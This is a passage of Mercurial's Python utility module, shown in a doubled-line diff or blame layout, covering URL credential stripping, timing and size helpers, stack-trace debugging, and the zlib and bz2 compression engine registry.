3031 u.passwd = '***'
3032 return bytes(u)
3032 return bytes(u)
3033
3033
3034 def removeauth(u):
3034 def removeauth(u):
3035 '''remove all authentication information from a url string'''
3035 '''remove all authentication information from a url string'''
3036 u = url(u)
3036 u = url(u)
3037 u.user = u.passwd = None
3037 u.user = u.passwd = None
3038 return str(u)
3038 return str(u)
3039
3039
3040 timecount = unitcountfn(
3040 timecount = unitcountfn(
3041 (1, 1e3, _('%.0f s')),
3041 (1, 1e3, _('%.0f s')),
3042 (100, 1, _('%.1f s')),
3042 (100, 1, _('%.1f s')),
3043 (10, 1, _('%.2f s')),
3043 (10, 1, _('%.2f s')),
3044 (1, 1, _('%.3f s')),
3044 (1, 1, _('%.3f s')),
3045 (100, 0.001, _('%.1f ms')),
3045 (100, 0.001, _('%.1f ms')),
3046 (10, 0.001, _('%.2f ms')),
3046 (10, 0.001, _('%.2f ms')),
3047 (1, 0.001, _('%.3f ms')),
3047 (1, 0.001, _('%.3f ms')),
3048 (100, 0.000001, _('%.1f us')),
3048 (100, 0.000001, _('%.1f us')),
3049 (10, 0.000001, _('%.2f us')),
3049 (10, 0.000001, _('%.2f us')),
3050 (1, 0.000001, _('%.3f us')),
3050 (1, 0.000001, _('%.3f us')),
3051 (100, 0.000000001, _('%.1f ns')),
3051 (100, 0.000000001, _('%.1f ns')),
3052 (10, 0.000000001, _('%.2f ns')),
3052 (10, 0.000000001, _('%.2f ns')),
3053 (1, 0.000000001, _('%.3f ns')),
3053 (1, 0.000000001, _('%.3f ns')),
3054 )
3054 )
3055
3055
3056 _timenesting = [0]
3056 _timenesting = [0]
3057
3057
3058 def timed(func):
3058 def timed(func):
3059 '''Report the execution time of a function call to stderr.
3059 '''Report the execution time of a function call to stderr.
3060
3060
3061 During development, use as a decorator when you need to measure
3061 During development, use as a decorator when you need to measure
3062 the cost of a function, e.g. as follows:
3062 the cost of a function, e.g. as follows:
3063
3063
3064 @util.timed
3064 @util.timed
3065 def foo(a, b, c):
3065 def foo(a, b, c):
3066 pass
3066 pass
3067 '''
3067 '''
3068
3068
3069 def wrapper(*args, **kwargs):
3069 def wrapper(*args, **kwargs):
3070 start = timer()
3070 start = timer()
3071 indent = 2
3071 indent = 2
3072 _timenesting[0] += indent
3072 _timenesting[0] += indent
3073 try:
3073 try:
3074 return func(*args, **kwargs)
3074 return func(*args, **kwargs)
3075 finally:
3075 finally:
3076 elapsed = timer() - start
3076 elapsed = timer() - start
3077 _timenesting[0] -= indent
3077 _timenesting[0] -= indent
3078 stderr.write('%s%s: %s\n' %
3078 stderr.write('%s%s: %s\n' %
3079 (' ' * _timenesting[0], func.__name__,
3079 (' ' * _timenesting[0], func.__name__,
3080 timecount(elapsed)))
3080 timecount(elapsed)))
3081 return wrapper
3081 return wrapper
3082
3082
3083 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3083 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3084 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3084 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3085
3085
3086 def sizetoint(s):
3086 def sizetoint(s):
3087 '''Convert a space specifier to a byte count.
3087 '''Convert a space specifier to a byte count.
3088
3088
3089 >>> sizetoint(b'30')
3089 >>> sizetoint(b'30')
3090 30
3090 30
3091 >>> sizetoint(b'2.2kb')
3091 >>> sizetoint(b'2.2kb')
3092 2252
3092 2252
3093 >>> sizetoint(b'6M')
3093 >>> sizetoint(b'6M')
3094 6291456
3094 6291456
3095 '''
3095 '''
3096 t = s.strip().lower()
3096 t = s.strip().lower()
3097 try:
3097 try:
3098 for k, u in _sizeunits:
3098 for k, u in _sizeunits:
3099 if t.endswith(k):
3099 if t.endswith(k):
3100 return int(float(t[:-len(k)]) * u)
3100 return int(float(t[:-len(k)]) * u)
3101 return int(t)
3101 return int(t)
3102 except ValueError:
3102 except ValueError:
3103 raise error.ParseError(_("couldn't parse size: %s") % s)
3103 raise error.ParseError(_("couldn't parse size: %s") % s)
3104
3104
3105 class hooks(object):
3105 class hooks(object):
3106 '''A collection of hook functions that can be used to extend a
3106 '''A collection of hook functions that can be used to extend a
3107 function's behavior. Hooks are called in lexicographic order,
3107 function's behavior. Hooks are called in lexicographic order,
3108 based on the names of their sources.'''
3108 based on the names of their sources.'''
3109
3109
3110 def __init__(self):
3110 def __init__(self):
3111 self._hooks = []
3111 self._hooks = []
3112
3112
3113 def add(self, source, hook):
3113 def add(self, source, hook):
3114 self._hooks.append((source, hook))
3114 self._hooks.append((source, hook))
3115
3115
3116 def __call__(self, *args):
3116 def __call__(self, *args):
3117 self._hooks.sort(key=lambda x: x[0])
3117 self._hooks.sort(key=lambda x: x[0])
3118 results = []
3118 results = []
3119 for source, hook in self._hooks:
3119 for source, hook in self._hooks:
3120 results.append(hook(*args))
3120 results.append(hook(*args))
3121 return results
3121 return results
3122
3122
3123 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3123 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3124 '''Yields lines for a nicely formatted stacktrace.
3124 '''Yields lines for a nicely formatted stacktrace.
3125 Skips the 'skip' last entries, then return the last 'depth' entries.
3125 Skips the 'skip' last entries, then return the last 'depth' entries.
3126 Each file+linenumber is formatted according to fileline.
3126 Each file+linenumber is formatted according to fileline.
3127 Each line is formatted according to line.
3127 Each line is formatted according to line.
3128 If line is None, it yields:
3128 If line is None, it yields:
3129 length of longest filepath+line number,
3129 length of longest filepath+line number,
3130 filepath+linenumber,
3130 filepath+linenumber,
3131 function
3131 function
3132
3132
3133 Not be used in production code but very convenient while developing.
3133 Not be used in production code but very convenient while developing.
3134 '''
3134 '''
3135 entries = [(fileline % (fn, ln), func)
3135 entries = [(fileline % (fn, ln), func)
3136 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3136 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3137 ][-depth:]
3137 ][-depth:]
3138 if entries:
3138 if entries:
3139 fnmax = max(len(entry[0]) for entry in entries)
3139 fnmax = max(len(entry[0]) for entry in entries)
3140 for fnln, func in entries:
3140 for fnln, func in entries:
3141 if line is None:
3141 if line is None:
3142 yield (fnmax, fnln, func)
3142 yield (fnmax, fnln, func)
3143 else:
3143 else:
3144 yield line % (fnmax, fnln, func)
3144 yield line % (fnmax, fnln, func)
3145
3145
3146 def debugstacktrace(msg='stacktrace', skip=0,
3146 def debugstacktrace(msg='stacktrace', skip=0,
3147 f=stderr, otherf=stdout, depth=0):
3147 f=stderr, otherf=stdout, depth=0):
3148 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3148 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3149 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3149 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3150 By default it will flush stdout first.
3150 By default it will flush stdout first.
3151 It can be used everywhere and intentionally does not require an ui object.
3151 It can be used everywhere and intentionally does not require an ui object.
3152 Not be used in production code but very convenient while developing.
3152 Not be used in production code but very convenient while developing.
3153 '''
3153 '''
3154 if otherf:
3154 if otherf:
3155 otherf.flush()
3155 otherf.flush()
3156 f.write('%s at:\n' % msg.rstrip())
3156 f.write('%s at:\n' % msg.rstrip())
3157 for line in getstackframes(skip + 1, depth=depth):
3157 for line in getstackframes(skip + 1, depth=depth):
3158 f.write(line)
3158 f.write(line)
3159 f.flush()
3159 f.flush()
3160
3160
3161 class dirs(object):
3161 class dirs(object):
3162 '''a multiset of directory names from a dirstate or manifest'''
3162 '''a multiset of directory names from a dirstate or manifest'''
3163
3163
3164 def __init__(self, map, skip=None):
3164 def __init__(self, map, skip=None):
3165 self._dirs = {}
3165 self._dirs = {}
3166 addpath = self.addpath
3166 addpath = self.addpath
3167 if safehasattr(map, 'iteritems') and skip is not None:
3167 if safehasattr(map, 'iteritems') and skip is not None:
3168 for f, s in map.iteritems():
3168 for f, s in map.iteritems():
3169 if s[0] != skip:
3169 if s[0] != skip:
3170 addpath(f)
3170 addpath(f)
3171 else:
3171 else:
3172 for f in map:
3172 for f in map:
3173 addpath(f)
3173 addpath(f)
3174
3174
3175 def addpath(self, path):
3175 def addpath(self, path):
3176 dirs = self._dirs
3176 dirs = self._dirs
3177 for base in finddirs(path):
3177 for base in finddirs(path):
3178 if base in dirs:
3178 if base in dirs:
3179 dirs[base] += 1
3179 dirs[base] += 1
3180 return
3180 return
3181 dirs[base] = 1
3181 dirs[base] = 1
3182
3182
3183 def delpath(self, path):
3183 def delpath(self, path):
3184 dirs = self._dirs
3184 dirs = self._dirs
3185 for base in finddirs(path):
3185 for base in finddirs(path):
3186 if dirs[base] > 1:
3186 if dirs[base] > 1:
3187 dirs[base] -= 1
3187 dirs[base] -= 1
3188 return
3188 return
3189 del dirs[base]
3189 del dirs[base]
3190
3190
3191 def __iter__(self):
3191 def __iter__(self):
3192 return iter(self._dirs)
3192 return iter(self._dirs)
3193
3193
3194 def __contains__(self, d):
3194 def __contains__(self, d):
3195 return d in self._dirs
3195 return d in self._dirs
3196
3196
3197 if safehasattr(parsers, 'dirs'):
3197 if safehasattr(parsers, 'dirs'):
3198 dirs = parsers.dirs
3198 dirs = parsers.dirs
3199
3199
3200 def finddirs(path):
3200 def finddirs(path):
3201 pos = path.rfind('/')
3201 pos = path.rfind('/')
3202 while pos != -1:
3202 while pos != -1:
3203 yield path[:pos]
3203 yield path[:pos]
3204 pos = path.rfind('/', 0, pos)
3204 pos = path.rfind('/', 0, pos)
3205
3205
3206 # compression code
3206 # compression code
3207
3207
3208 SERVERROLE = 'server'
3208 SERVERROLE = 'server'
3209 CLIENTROLE = 'client'
3209 CLIENTROLE = 'client'
3210
3210
3211 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3211 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3212 (u'name', u'serverpriority',
3212 (u'name', u'serverpriority',
3213 u'clientpriority'))
3213 u'clientpriority'))
3214
3214
3215 class compressormanager(object):
3215 class compressormanager(object):
3216 """Holds registrations of various compression engines.
3216 """Holds registrations of various compression engines.
3217
3217
3218 This class essentially abstracts the differences between compression
3218 This class essentially abstracts the differences between compression
3219 engines to allow new compression formats to be added easily, possibly from
3219 engines to allow new compression formats to be added easily, possibly from
3220 extensions.
3220 extensions.
3221
3221
3222 Compressors are registered against the global instance by calling its
3222 Compressors are registered against the global instance by calling its
3223 ``register()`` method.
3223 ``register()`` method.
3224 """
3224 """
3225 def __init__(self):
3225 def __init__(self):
3226 self._engines = {}
3226 self._engines = {}
3227 # Bundle spec human name to engine name.
3227 # Bundle spec human name to engine name.
3228 self._bundlenames = {}
3228 self._bundlenames = {}
3229 # Internal bundle identifier to engine name.
3229 # Internal bundle identifier to engine name.
3230 self._bundletypes = {}
3230 self._bundletypes = {}
3231 # Revlog header to engine name.
3231 # Revlog header to engine name.
3232 self._revlogheaders = {}
3232 self._revlogheaders = {}
3233 # Wire proto identifier to engine name.
3233 # Wire proto identifier to engine name.
3234 self._wiretypes = {}
3234 self._wiretypes = {}
3235
3235
3236 def __getitem__(self, key):
3236 def __getitem__(self, key):
3237 return self._engines[key]
3237 return self._engines[key]
3238
3238
3239 def __contains__(self, key):
3239 def __contains__(self, key):
3240 return key in self._engines
3240 return key in self._engines
3241
3241
3242 def __iter__(self):
3242 def __iter__(self):
3243 return iter(self._engines.keys())
3243 return iter(self._engines.keys())
3244
3244
3245 def register(self, engine):
3245 def register(self, engine):
3246 """Register a compression engine with the manager.
3246 """Register a compression engine with the manager.
3247
3247
3248 The argument must be a ``compressionengine`` instance.
3248 The argument must be a ``compressionengine`` instance.
3249 """
3249 """
3250 if not isinstance(engine, compressionengine):
3250 if not isinstance(engine, compressionengine):
3251 raise ValueError(_('argument must be a compressionengine'))
3251 raise ValueError(_('argument must be a compressionengine'))
3252
3252
3253 name = engine.name()
3253 name = engine.name()
3254
3254
3255 if name in self._engines:
3255 if name in self._engines:
3256 raise error.Abort(_('compression engine %s already registered') %
3256 raise error.Abort(_('compression engine %s already registered') %
3257 name)
3257 name)
3258
3258
3259 bundleinfo = engine.bundletype()
3259 bundleinfo = engine.bundletype()
3260 if bundleinfo:
3260 if bundleinfo:
3261 bundlename, bundletype = bundleinfo
3261 bundlename, bundletype = bundleinfo
3262
3262
3263 if bundlename in self._bundlenames:
3263 if bundlename in self._bundlenames:
3264 raise error.Abort(_('bundle name %s already registered') %
3264 raise error.Abort(_('bundle name %s already registered') %
3265 bundlename)
3265 bundlename)
3266 if bundletype in self._bundletypes:
3266 if bundletype in self._bundletypes:
3267 raise error.Abort(_('bundle type %s already registered by %s') %
3267 raise error.Abort(_('bundle type %s already registered by %s') %
3268 (bundletype, self._bundletypes[bundletype]))
3268 (bundletype, self._bundletypes[bundletype]))
3269
3269
3270 # No external facing name declared.
3270 # No external facing name declared.
3271 if bundlename:
3271 if bundlename:
3272 self._bundlenames[bundlename] = name
3272 self._bundlenames[bundlename] = name
3273
3273
3274 self._bundletypes[bundletype] = name
3274 self._bundletypes[bundletype] = name
3275
3275
3276 wiresupport = engine.wireprotosupport()
3276 wiresupport = engine.wireprotosupport()
3277 if wiresupport:
3277 if wiresupport:
3278 wiretype = wiresupport.name
3278 wiretype = wiresupport.name
3279 if wiretype in self._wiretypes:
3279 if wiretype in self._wiretypes:
3280 raise error.Abort(_('wire protocol compression %s already '
3280 raise error.Abort(_('wire protocol compression %s already '
3281 'registered by %s') %
3281 'registered by %s') %
3282 (wiretype, self._wiretypes[wiretype]))
3282 (wiretype, self._wiretypes[wiretype]))
3283
3283
3284 self._wiretypes[wiretype] = name
3284 self._wiretypes[wiretype] = name
3285
3285
3286 revlogheader = engine.revlogheader()
3286 revlogheader = engine.revlogheader()
3287 if revlogheader and revlogheader in self._revlogheaders:
3287 if revlogheader and revlogheader in self._revlogheaders:
3288 raise error.Abort(_('revlog header %s already registered by %s') %
3288 raise error.Abort(_('revlog header %s already registered by %s') %
3289 (revlogheader, self._revlogheaders[revlogheader]))
3289 (revlogheader, self._revlogheaders[revlogheader]))
3290
3290
3291 if revlogheader:
3291 if revlogheader:
3292 self._revlogheaders[revlogheader] = name
3292 self._revlogheaders[revlogheader] = name
3293
3293
3294 self._engines[name] = engine
3294 self._engines[name] = engine
3295
3295
3296 @property
3296 @property
3297 def supportedbundlenames(self):
3297 def supportedbundlenames(self):
3298 return set(self._bundlenames.keys())
3298 return set(self._bundlenames.keys())
3299
3299
3300 @property
3300 @property
3301 def supportedbundletypes(self):
3301 def supportedbundletypes(self):
3302 return set(self._bundletypes.keys())
3302 return set(self._bundletypes.keys())
3303
3303
3304 def forbundlename(self, bundlename):
3304 def forbundlename(self, bundlename):
3305 """Obtain a compression engine registered to a bundle name.
3305 """Obtain a compression engine registered to a bundle name.
3306
3306
3307 Will raise KeyError if the bundle type isn't registered.
3307 Will raise KeyError if the bundle type isn't registered.
3308
3308
3309 Will abort if the engine is known but not available.
3309 Will abort if the engine is known but not available.
3310 """
3310 """
3311 engine = self._engines[self._bundlenames[bundlename]]
3311 engine = self._engines[self._bundlenames[bundlename]]
3312 if not engine.available():
3312 if not engine.available():
3313 raise error.Abort(_('compression engine %s could not be loaded') %
3313 raise error.Abort(_('compression engine %s could not be loaded') %
3314 engine.name())
3314 engine.name())
3315 return engine
3315 return engine
3316
3316
3317 def forbundletype(self, bundletype):
3317 def forbundletype(self, bundletype):
3318 """Obtain a compression engine registered to a bundle type.
3318 """Obtain a compression engine registered to a bundle type.
3319
3319
3320 Will raise KeyError if the bundle type isn't registered.
3320 Will raise KeyError if the bundle type isn't registered.
3321
3321
3322 Will abort if the engine is known but not available.
3322 Will abort if the engine is known but not available.
3323 """
3323 """
3324 engine = self._engines[self._bundletypes[bundletype]]
3324 engine = self._engines[self._bundletypes[bundletype]]
3325 if not engine.available():
3325 if not engine.available():
3326 raise error.Abort(_('compression engine %s could not be loaded') %
3326 raise error.Abort(_('compression engine %s could not be loaded') %
3327 engine.name())
3327 engine.name())
3328 return engine
3328 return engine
3329
3329
3330 def supportedwireengines(self, role, onlyavailable=True):
3330 def supportedwireengines(self, role, onlyavailable=True):
3331 """Obtain compression engines that support the wire protocol.
3331 """Obtain compression engines that support the wire protocol.
3332
3332
3333 Returns a list of engines in prioritized order, most desired first.
3333 Returns a list of engines in prioritized order, most desired first.
3334
3334
3335 If ``onlyavailable`` is set, filter out engines that can't be
3335 If ``onlyavailable`` is set, filter out engines that can't be
3336 loaded.
3336 loaded.
3337 """
3337 """
3338 assert role in (SERVERROLE, CLIENTROLE)
3338 assert role in (SERVERROLE, CLIENTROLE)
3339
3339
3340 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3340 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3341
3341
3342 engines = [self._engines[e] for e in self._wiretypes.values()]
3342 engines = [self._engines[e] for e in self._wiretypes.values()]
3343 if onlyavailable:
3343 if onlyavailable:
3344 engines = [e for e in engines if e.available()]
3344 engines = [e for e in engines if e.available()]
3345
3345
3346 def getkey(e):
3346 def getkey(e):
3347 # Sort first by priority, highest first. In case of tie, sort
3347 # Sort first by priority, highest first. In case of tie, sort
3348 # alphabetically. This is arbitrary, but ensures output is
3348 # alphabetically. This is arbitrary, but ensures output is
3349 # stable.
3349 # stable.
3350 w = e.wireprotosupport()
3350 w = e.wireprotosupport()
3351 return -1 * getattr(w, attr), w.name
3351 return -1 * getattr(w, attr), w.name
3352
3352
3353 return list(sorted(engines, key=getkey))
3353 return list(sorted(engines, key=getkey))
3354
3354
3355 def forwiretype(self, wiretype):
3355 def forwiretype(self, wiretype):
3356 engine = self._engines[self._wiretypes[wiretype]]
3356 engine = self._engines[self._wiretypes[wiretype]]
3357 if not engine.available():
3357 if not engine.available():
3358 raise error.Abort(_('compression engine %s could not be loaded') %
3358 raise error.Abort(_('compression engine %s could not be loaded') %
3359 engine.name())
3359 engine.name())
3360 return engine
3360 return engine
3361
3361
3362 def forrevlogheader(self, header):
3362 def forrevlogheader(self, header):
3363 """Obtain a compression engine registered to a revlog header.
3363 """Obtain a compression engine registered to a revlog header.
3364
3364
3365 Will raise KeyError if the revlog header value isn't registered.
3365 Will raise KeyError if the revlog header value isn't registered.
3366 """
3366 """
3367 return self._engines[self._revlogheaders[header]]
3367 return self._engines[self._revlogheaders[header]]
3368
3368
3369 compengines = compressormanager()
3369 compengines = compressormanager()
3370
3370
3371 class compressionengine(object):
3371 class compressionengine(object):
3372 """Base class for compression engines.
3372 """Base class for compression engines.
3373
3373
3374 Compression engines must implement the interface defined by this class.
3374 Compression engines must implement the interface defined by this class.
3375 """
3375 """
3376 def name(self):
3376 def name(self):
3377 """Returns the name of the compression engine.
3377 """Returns the name of the compression engine.
3378
3378
3379 This is the key the engine is registered under.
3379 This is the key the engine is registered under.
3380
3380
3381 This method must be implemented.
3381 This method must be implemented.
3382 """
3382 """
3383 raise NotImplementedError()
3383 raise NotImplementedError()
3384
3384
3385 def available(self):
3385 def available(self):
3386 """Whether the compression engine is available.
3386 """Whether the compression engine is available.
3387
3387
3388 The intent of this method is to allow optional compression engines
3388 The intent of this method is to allow optional compression engines
3389 that may not be available in all installations (such as engines relying
3389 that may not be available in all installations (such as engines relying
3390 on C extensions that may not be present).
3390 on C extensions that may not be present).
3391 """
3391 """
3392 return True
3392 return True
3393
3393
3394 def bundletype(self):
3394 def bundletype(self):
3395 """Describes bundle identifiers for this engine.
3395 """Describes bundle identifiers for this engine.
3396
3396
3397 If this compression engine isn't supported for bundles, returns None.
3397 If this compression engine isn't supported for bundles, returns None.
3398
3398
3399 If this engine can be used for bundles, returns a 2-tuple of strings of
3399 If this engine can be used for bundles, returns a 2-tuple of strings of
3400 the user-facing "bundle spec" compression name and an internal
3400 the user-facing "bundle spec" compression name and an internal
3401 identifier used to denote the compression format within bundles. To
3401 identifier used to denote the compression format within bundles. To
3402 exclude the name from external usage, set the first element to ``None``.
3402 exclude the name from external usage, set the first element to ``None``.
3403
3403
3404 If bundle compression is supported, the class must also implement
3404 If bundle compression is supported, the class must also implement
3405 ``compressstream`` and `decompressorreader``.
3405 ``compressstream`` and `decompressorreader``.
3406
3406
3407 The docstring of this method is used in the help system to tell users
3407 The docstring of this method is used in the help system to tell users
3408 about this engine.
3408 about this engine.
3409 """
3409 """
3410 return None
3410 return None
3411
3411
3412 def wireprotosupport(self):
3412 def wireprotosupport(self):
3413 """Declare support for this compression format on the wire protocol.
3413 """Declare support for this compression format on the wire protocol.
3414
3414
3415 If this compression engine isn't supported for compressing wire
3415 If this compression engine isn't supported for compressing wire
3416 protocol payloads, returns None.
3416 protocol payloads, returns None.
3417
3417
3418 Otherwise, returns ``compenginewireprotosupport`` with the following
3418 Otherwise, returns ``compenginewireprotosupport`` with the following
3419 fields:
3419 fields:
3420
3420
3421 * String format identifier
3421 * String format identifier
3422 * Integer priority for the server
3422 * Integer priority for the server
3423 * Integer priority for the client
3423 * Integer priority for the client
3424
3424
3425 The integer priorities are used to order the advertisement of format
3425 The integer priorities are used to order the advertisement of format
3426 support by server and client. The highest integer is advertised
3426 support by server and client. The highest integer is advertised
3427 first. Integers with non-positive values aren't advertised.
3427 first. Integers with non-positive values aren't advertised.
3428
3428
3429 The priority values are somewhat arbitrary and only used for default
3429 The priority values are somewhat arbitrary and only used for default
3430 ordering. The relative order can be changed via config options.
3430 ordering. The relative order can be changed via config options.
3431
3431
3432 If wire protocol compression is supported, the class must also implement
3432 If wire protocol compression is supported, the class must also implement
3433 ``compressstream`` and ``decompressorreader``.
3433 ``compressstream`` and ``decompressorreader``.
3434 """
3434 """
3435 return None
3435 return None
3436
3436
3437 def revlogheader(self):
3437 def revlogheader(self):
3438 """Header added to revlog chunks that identifies this engine.
3438 """Header added to revlog chunks that identifies this engine.
3439
3439
3440 If this engine can be used to compress revlogs, this method should
3440 If this engine can be used to compress revlogs, this method should
3441 return the bytes used to identify chunks compressed with this engine.
3441 return the bytes used to identify chunks compressed with this engine.
3442 Else, the method should return ``None`` to indicate it does not
3442 Else, the method should return ``None`` to indicate it does not
3443 participate in revlog compression.
3443 participate in revlog compression.
3444 """
3444 """
3445 return None
3445 return None
3446
3446
3447 def compressstream(self, it, opts=None):
3447 def compressstream(self, it, opts=None):
3448 """Compress an iterator of chunks.
3448 """Compress an iterator of chunks.
3449
3449
3450 The method receives an iterator (ideally a generator) of chunks of
3450 The method receives an iterator (ideally a generator) of chunks of
3451 bytes to be compressed. It returns an iterator (ideally a generator)
3451 bytes to be compressed. It returns an iterator (ideally a generator)
3452 of bytes of chunks representing the compressed output.
3452 of bytes of chunks representing the compressed output.
3453
3453
3454 Optionally accepts an argument defining how to perform compression.
3454 Optionally accepts an argument defining how to perform compression.
3455 Each engine treats this argument differently.
3455 Each engine treats this argument differently.
3456 """
3456 """
3457 raise NotImplementedError()
3457 raise NotImplementedError()
3458
3458
3459 def decompressorreader(self, fh):
3459 def decompressorreader(self, fh):
3460 """Perform decompression on a file object.
3460 """Perform decompression on a file object.
3461
3461
3462 Argument is an object with a ``read(size)`` method that returns
3462 Argument is an object with a ``read(size)`` method that returns
3463 compressed data. Return value is an object with a ``read(size)`` that
3463 compressed data. Return value is an object with a ``read(size)`` that
3464 returns uncompressed data.
3464 returns uncompressed data.
3465 """
3465 """
3466 raise NotImplementedError()
3466 raise NotImplementedError()
3467
3467
3468 def revlogcompressor(self, opts=None):
3468 def revlogcompressor(self, opts=None):
3469 """Obtain an object that can be used to compress revlog entries.
3469 """Obtain an object that can be used to compress revlog entries.
3470
3470
3471 The object has a ``compress(data)`` method that compresses binary
3471 The object has a ``compress(data)`` method that compresses binary
3472 data. This method returns compressed binary data or ``None`` if
3472 data. This method returns compressed binary data or ``None`` if
3473 the data could not be compressed (too small, not compressible, etc).
3473 the data could not be compressed (too small, not compressible, etc).
3474 The returned data should have a header uniquely identifying this
3474 The returned data should have a header uniquely identifying this
3475 compression format so decompression can be routed to this engine.
3475 compression format so decompression can be routed to this engine.
3476 This header should be identified by the ``revlogheader()`` return
3476 This header should be identified by the ``revlogheader()`` return
3477 value.
3477 value.
3478
3478
3479 The object has a ``decompress(data)`` method that decompresses
3479 The object has a ``decompress(data)`` method that decompresses
3480 data. The method will only be called if ``data`` begins with
3480 data. The method will only be called if ``data`` begins with
3481 ``revlogheader()``. The method should return the raw, uncompressed
3481 ``revlogheader()``. The method should return the raw, uncompressed
3482 data or raise a ``RevlogError``.
3482 data or raise a ``RevlogError``.
3483
3483
3484 The object is reusable but is not thread safe.
3484 The object is reusable but is not thread safe.
3485 """
3485 """
3486 raise NotImplementedError()
3486 raise NotImplementedError()
3487
3487
3488 class _zlibengine(compressionengine):
3488 class _zlibengine(compressionengine):
3489 def name(self):
3489 def name(self):
3490 return 'zlib'
3490 return 'zlib'
3491
3491
3492 def bundletype(self):
3492 def bundletype(self):
3493 """zlib compression using the DEFLATE algorithm.
3493 """zlib compression using the DEFLATE algorithm.
3494
3494
3495 All Mercurial clients should support this format. The compression
3495 All Mercurial clients should support this format. The compression
3496 algorithm strikes a reasonable balance between compression ratio
3496 algorithm strikes a reasonable balance between compression ratio
3497 and size.
3497 and size.
3498 """
3498 """
3499 return 'gzip', 'GZ'
3499 return 'gzip', 'GZ'
3500
3500
3501 def wireprotosupport(self):
3501 def wireprotosupport(self):
3502 return compewireprotosupport('zlib', 20, 20)
3502 return compewireprotosupport('zlib', 20, 20)
3503
3503
3504 def revlogheader(self):
3504 def revlogheader(self):
3505 return 'x'
3505 return 'x'
3506
3506
3507 def compressstream(self, it, opts=None):
3507 def compressstream(self, it, opts=None):
3508 opts = opts or {}
3508 opts = opts or {}
3509
3509
3510 z = zlib.compressobj(opts.get('level', -1))
3510 z = zlib.compressobj(opts.get('level', -1))
3511 for chunk in it:
3511 for chunk in it:
3512 data = z.compress(chunk)
3512 data = z.compress(chunk)
3513 # Not all calls to compress emit data. It is cheaper to inspect
3513 # Not all calls to compress emit data. It is cheaper to inspect
3514 # here than to feed empty chunks through generator.
3514 # here than to feed empty chunks through generator.
3515 if data:
3515 if data:
3516 yield data
3516 yield data
3517
3517
3518 yield z.flush()
3518 yield z.flush()
3519
3519
3520 def decompressorreader(self, fh):
3520 def decompressorreader(self, fh):
3521 def gen():
3521 def gen():
3522 d = zlib.decompressobj()
3522 d = zlib.decompressobj()
3523 for chunk in filechunkiter(fh):
3523 for chunk in filechunkiter(fh):
3524 while chunk:
3524 while chunk:
3525 # Limit output size to limit memory.
3525 # Limit output size to limit memory.
3526 yield d.decompress(chunk, 2 ** 18)
3526 yield d.decompress(chunk, 2 ** 18)
3527 chunk = d.unconsumed_tail
3527 chunk = d.unconsumed_tail
3528
3528
3529 return chunkbuffer(gen())
3529 return chunkbuffer(gen())
3530
3530
3531 class zlibrevlogcompressor(object):
3531 class zlibrevlogcompressor(object):
3532 def compress(self, data):
3532 def compress(self, data):
3533 insize = len(data)
3533 insize = len(data)
3534 # Caller handles empty input case.
3534 # Caller handles empty input case.
3535 assert insize > 0
3535 assert insize > 0
3536
3536
3537 if insize < 44:
3537 if insize < 44:
3538 return None
3538 return None
3539
3539
3540 elif insize <= 1000000:
3540 elif insize <= 1000000:
3541 compressed = zlib.compress(data)
3541 compressed = zlib.compress(data)
3542 if len(compressed) < insize:
3542 if len(compressed) < insize:
3543 return compressed
3543 return compressed
3544 return None
3544 return None
3545
3545
3546 # zlib makes an internal copy of the input buffer, doubling
3546 # zlib makes an internal copy of the input buffer, doubling
3547 # memory usage for large inputs. So do streaming compression
3547 # memory usage for large inputs. So do streaming compression
3548 # on large inputs.
3548 # on large inputs.
3549 else:
3549 else:
3550 z = zlib.compressobj()
3550 z = zlib.compressobj()
3551 parts = []
3551 parts = []
3552 pos = 0
3552 pos = 0
3553 while pos < insize:
3553 while pos < insize:
3554 pos2 = pos + 2**20
3554 pos2 = pos + 2**20
3555 parts.append(z.compress(data[pos:pos2]))
3555 parts.append(z.compress(data[pos:pos2]))
3556 pos = pos2
3556 pos = pos2
3557 parts.append(z.flush())
3557 parts.append(z.flush())
3558
3558
3559 if sum(map(len, parts)) < insize:
3559 if sum(map(len, parts)) < insize:
3560 return ''.join(parts)
3560 return ''.join(parts)
3561 return None
3561 return None
3562
3562
3563 def decompress(self, data):
3563 def decompress(self, data):
3564 try:
3564 try:
3565 return zlib.decompress(data)
3565 return zlib.decompress(data)
3566 except zlib.error as e:
3566 except zlib.error as e:
3567 raise error.RevlogError(_('revlog decompress error: %s') %
3567 raise error.RevlogError(_('revlog decompress error: %s') %
3568 str(e))
3568 str(e))
3569
3569
3570 def revlogcompressor(self, opts=None):
3570 def revlogcompressor(self, opts=None):
3571 return self.zlibrevlogcompressor()
3571 return self.zlibrevlogcompressor()
3572
3572
3573 compengines.register(_zlibengine())
3573 compengines.register(_zlibengine())
3574
3574
3575 class _bz2engine(compressionengine):
3575 class _bz2engine(compressionengine):
3576 def name(self):
3576 def name(self):
3577 return 'bz2'
3577 return 'bz2'
3578
3578
3579 def bundletype(self):
3579 def bundletype(self):
3580 """An algorithm that produces smaller bundles than ``gzip``.
3580 """An algorithm that produces smaller bundles than ``gzip``.
3581
3581
3582 All Mercurial clients should support this format.
3582 All Mercurial clients should support this format.
3583
3583
3584 This engine will likely produce smaller bundles than ``gzip`` but
3584 This engine will likely produce smaller bundles than ``gzip`` but
3585 will be significantly slower, both during compression and
3585 will be significantly slower, both during compression and
3586 decompression.
3586 decompression.
3587
3587
3588 If available, the ``zstd`` engine can yield similar or better
3588 If available, the ``zstd`` engine can yield similar or better
3589 compression at much higher speeds.
3589 compression at much higher speeds.
3590 """
3590 """
3591 return 'bzip2', 'BZ'
3591 return 'bzip2', 'BZ'
3592
3592
